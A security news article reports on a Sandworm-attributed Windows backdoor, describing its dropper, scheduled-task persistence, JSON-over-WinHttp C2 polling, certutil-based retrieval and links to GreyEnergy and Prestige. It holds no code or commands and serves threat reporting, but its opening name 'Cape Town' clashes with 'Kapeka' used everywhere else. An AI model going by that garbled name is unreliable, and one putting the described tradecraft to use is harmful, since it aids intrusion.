A previously undocumented “flexible” backdoor called Cape Town has been observed “sporadically” in cyberattacks against Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russian-linked Advanced Persistent Threat (APT) group and identified it as Sandworm (also known as APT44 or Seashell Blizzard). Microsoft is tracking the same malware under the name KnuckleTouch.
“The malware […] it is a flexible backdoor with all the necessary features to serve as an early-stage toolkit for its operators and also to provide long-term access to victims’ assets,” said security researcher Mohammad Kazem Hassan Nejad.
Kapeka comes with a dropper designed to launch and run a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting persistence for the backdoor as a scheduled task or autorun log, depending on whether the process has SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as being involved in multiple ransomware distribution campaigns and that it can be used to perform a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
The backdoor is a Windows DLL written in C++ and has a built-in command and control (C2) configuration used to establish contact with an actor-controlled server and contains information about how often the server must be queried in order to retrieve commands.
In addition to masquerading as a Microsoft Word add-in to make it appear authentic, the backdoor DLL collects information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the execution results on the C2 server.
“The backdoor uses the WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communications component,” Nejad explained. “The backdoor communicates with its C2 to poll for tasks and send information with fingerprints and task results. The backdoor uses JSON to send and receive information from its C2.”
The plant is also able to update its C2 configuration on the fly by receiving a new version from the C2 server during polling. Some of the key features of the backdoor allow it to read and write files to and from disk, launch payloads, execute shell commands, and even update and uninstall itself.
The exact method through which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, highlighting the use of a legitimate binary (LOLBin) to orchestrate the attack.
Kapeka’s connections to Sandworm are conceptual, and the configuration overlaps with previously disclosed families such as GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
“It is likely that Kapeka was used in the intrusions that led to the distribution of the Prestige ransomware in late 2022,” WithSecure said. “It is likely that Kapeka is the successor to GreyEnergy, which in turn was likely a replacement for BlackEnergy in Sandworm’s arsenal.”
“The backdoor victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin.”